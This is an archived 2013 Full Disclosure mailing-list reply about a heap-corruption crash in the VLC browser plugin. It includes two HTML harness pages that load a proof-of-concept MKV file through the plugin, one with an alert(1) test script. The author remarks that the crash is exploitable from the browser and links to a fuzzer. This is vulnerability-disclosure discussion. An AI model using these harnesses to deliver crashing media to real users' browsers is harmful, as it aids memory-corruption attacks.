Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Full-Disclosure Digest, Vol 101, Issue 10

From: Sachin Shinde <sachinshinde1102 () gmail com>
Date: Wed, 10 Jul 2013 17:45:01 +0530
Hi,


Please please please try to understand the attack vectors guys ( please
think all the cases before giving up )

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
<html>
<head><title>Demo of VLC mozilla plugin</title></head>

<body>

<h1>Demo of VLC mozilla plugin - Example 1</h1>

<embed type="application/x-vlc-plugin"
         name="video1"
         autoplay="no" loop="yes" width="400" height="300"
         target="poc.mkv" />
<br />
  <a href="javascript:;" onclick='document.video1.play()'>Play video1</a>
  <a href="javascript:;" onclick='document.video1.pause()'>Pause video1</a>
  <a href="javascript:;" onclick='document.video1.stop()'>Stop video1</a>
  <a href="javascript:;"
onclick='document.video1.fullscreen()'>Fullscreen</a>

</body>
</html>


+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

<script>alert(1)</script>
<object
  classid="clsid:9BE31822-FDAD-461B-AD51-BE1D1C159921"
  codebase="
http://download.videolan.org/pub/videolan/vlc/last/win32/axvlc.cab";
  id="vlc"
  name="vlc"
  class="vlcPlayer"
  events="True">
    <param name="Src" value="poc.mkv" />
    <param name="ShowDisplay" value="True" />
    <param name="AutoLoop" value="True" />
    <param name="AutoPlay" value="True" />
 </object>
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Now the real problem is plugins are executed outside of the browser process
except IE.


you can use my gist mediafuzz for fuzzing fileformats in browser  (with
little modifications)
https://gist.github.com/cons0ul/2357771

Best,
Sachin Shinde
@cons0ul





On Wed, Jul 10, 2013 at 5:22 PM, Sachin Shinde
<sachinshinde1102 () gmail com>wrote:


Finally someone dumping debug logs on FD :)

Heres my debug logs


http://paste.ofcode.org/gcRAJB9ixqLKtxDBiyfvWv
http://paste.ofcode.org/BtL95whhBFDPXiKPeF8ViJ

poc crashes vlc at different addresses ( I have seen 3 different addresses
so far)
Looks like heap corruption,can be exploited if vlc plugin crashes in
browser :)

Cheers,
Sachin Shinde
@cons0ul



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: